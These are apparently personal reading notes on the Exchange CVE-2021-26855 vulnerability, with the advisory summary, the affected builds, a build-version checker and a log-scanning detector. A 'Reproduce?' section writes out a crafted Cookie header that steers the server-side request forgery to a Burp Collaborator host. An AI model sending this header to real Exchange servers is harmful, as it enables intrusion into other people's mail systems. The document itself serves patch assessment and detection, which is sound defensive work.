CVE-2021-26855: Reading Notes

CVE-2021-26855

Microsoft Exchange Server Remote Code Execution Vulnerability

Released: Mar 2, 2021 Last updated: Mar 11, 2021

But the exploit is not publicly disclosed.

Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft. It runs exclusively on Windows Server operating systems. Oh, I've used this Microsoft application… this is bad.

This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. This can be protected against by restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access. Using this mitigation will only protect against the initial portion of the attack. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file.

We recommend prioritizing installing updates on Exchange Servers that are externally facing.

Affected Versions

  • Exchange 2013 Versions < 15.00.1497.012
  • Exchange 2016 CU18 < 15.01.2106.013
  • Exchange 2016 CU19 < 15.01.2176.009
  • Exchange 2019 CU7 < 15.02.0721.013
  • Exchange 2019 CU8 < 15.02.0792.010
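A quick way to turn the affected-version list into something a defender can run over an inventory of Exchange build numbers. This is an added example, not code from Microsoft or from the sources linked below; the only data it uses is the five fixed builds listed above, and the build strings fed to it are constructed samples. The third component of an Exchange build (1497, 2106, 2176, 0721, 0792) identifies the product line and cumulative update, so a server whose build is not one of those five is reported as "unknown" rather than guessed at.

```python
"""Assess Exchange build numbers against the CVE-2021-26855 affected-version list.

Added example: the fixed builds come from the list on this page, nothing else.
"""
from typing import Dict, Tuple

# (major, minor, build) -> (label, first fixed revision), per the page's list.
FIXED_BUILDS: Dict[Tuple[int, int, int], Tuple[str, int]] = {
    (15, 0, 1497): ("Exchange 2013", 12),
    (15, 1, 2106): ("Exchange 2016 CU18", 13),
    (15, 1, 2176): ("Exchange 2016 CU19", 9),
    (15, 2, 721): ("Exchange 2019 CU7", 13),
    (15, 2, 792): ("Exchange 2019 CU8", 10),
}


def parse_build(version: str) -> Tuple[int, int, int, int]:
    """Parse 'major.minor.build.revision' (e.g. 15.01.2106.013) into ints.

    Leading zeros are accepted; int() handles them in Python 3.
    """
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not an Exchange build number: {version!r}")
    major, minor, build, rev = (int(p) for p in parts)
    return major, minor, build, rev


def assess(version: str) -> dict:
    """Return vulnerable / patched / unknown for one build number.

    'unknown' means the CU branch is not in the page's list; that is not a
    clean bill of health, it just means this table cannot decide.
    """
    major, minor, build, rev = parse_build(version)
    branch = FIXED_BUILDS.get((major, minor, build))
    if branch is None:
        return {"version": version, "branch": None, "status": "unknown"}
    label, fixed_rev = branch
    status = "vulnerable" if rev < fixed_rev else "patched"
    return {"version": version, "branch": label, "status": status}


def assess_inventory(versions) -> Dict[str, str]:
    """Map each build string in an inventory to its status."""
    return {v: assess(v)["status"] for v in versions}


if __name__ == "__main__":
    # Constructed sample inventory (not real hosts).
    sample = ["15.00.1497.011", "15.01.2106.013", "15.01.2176.004",
              "15.02.0721.013", "15.02.0792.003", "15.01.2000.001"]
    for v, s in assess_inventory(sample).items():
        print(f"{v}: {s}")
```

Builds on a CU branch that Microsoft did not list (for example an older, out-of-support CU) come back as "unknown" on purpose; they need a manual check against the vendor advisory rather than an automated "patched".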

Reproduce?

Tool: Burp Collaborator

Request path: /x.js

Add Cookie header:

Cookie: X-AnonResource=true; X-AnonResource-Backend=<collaborator>/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
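The same cookie names are what a defender should hunt for in web-server logs: a request for a static resource such as /x.js that arrives with X-BEResource or X-AnonResource-Backend set, especially one naming a backend other than the server itself, is the server-side request forgery being steered. Below is an added detection example (not from the page's sources) run over constructed log lines in a simplified W3C format with the cs(Cookie) field enabled; the host names and client IPs are made up, and IIS writes spaces in cookie values as "+", which the parser undoes.

```python
"""Flag requests that carry Exchange backend-selection cookies.

Added example. Log lines are constructed; the field order below is assumed to
be: date time c-ip cs-uri-stem cs(Cookie).
"""
import re
from typing import Dict, List

SUSPECT_COOKIES = ("X-BEResource", "X-AnonResource-Backend")
# Hosts that legitimately appear as the backend of this server (assumption).
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

# Constructed sample log. Only the first and last two requests are suspicious.
SAMPLE_LOG = """#Fields: date time c-ip cs-uri-stem cs(Cookie)
2021-03-03 10:15:01 203.0.113.7 /x.js X-AnonResource=true;X-AnonResource-Backend=collaborator.example/ecp/default.flt?~3;X-BEResource=localhost/owa/auth/logon.aspx?~3
2021-03-03 10:15:05 198.51.100.2 /owa/auth/logon.aspx ClientId=ABC123;OutlookSession=xyz
2021-03-03 10:15:09 203.0.113.7 /ecp/y.js X-BEResource=localhost/ecp/default.flt?~3
2021-03-03 10:15:12 192.0.2.9 /ecp/ X-BEResource=exchange01.corp.example/ecp/default.flt?~3
"""


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split 'a=1;b=2' into a dict; tolerant of stray spaces and trailing ';'."""
    cookies = {}
    for part in header.replace("+", " ").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def backend_target(value: str):
    """Extract the backend host and the '~N' version suffix from a cookie value."""
    host = value.split("/", 1)[0].split(":", 1)[0].lower()
    match = re.search(r"~(\d+)\s*$", value)
    return host, (int(match.group(1)) if match else None)


def inspect_request(client_ip: str, uri: str, cookie_header: str) -> List[dict]:
    """Return one alert per suspect cookie present on the request."""
    cookies = parse_cookie_header(cookie_header)
    alerts = []
    for name in SUSPECT_COOKIES:
        if name not in cookies:
            continue
        host, version = backend_target(cookies[name])
        # A backend that is not this server is the SSRF being pointed elsewhere.
        severity = "high" if host not in LOCAL_HOSTS else "medium"
        alerts.append({"client": client_ip, "uri": uri, "cookie": name,
                       "backend": host, "version": version, "severity": severity})
    return alerts


def scan_log(text: str) -> List[dict]:
    """Run inspect_request over every data line of a W3C-style log."""
    alerts = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(" ", 4)
        if len(fields) < 5:
            continue  # no cookie field on this line
        _date, _time, client_ip, uri, cookie = fields
        alerts.extend(inspect_request(client_ip, uri, cookie))
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['client']} {a['uri']} {a['cookie']} -> {a['backend']}")
```

Treat even the "medium" hits seriously: an anonymous request for a .js file has no business carrying backend-routing cookies at all, and the client IPs behind them are the first thing to pivot on in the rest of the logs.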

Reference

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/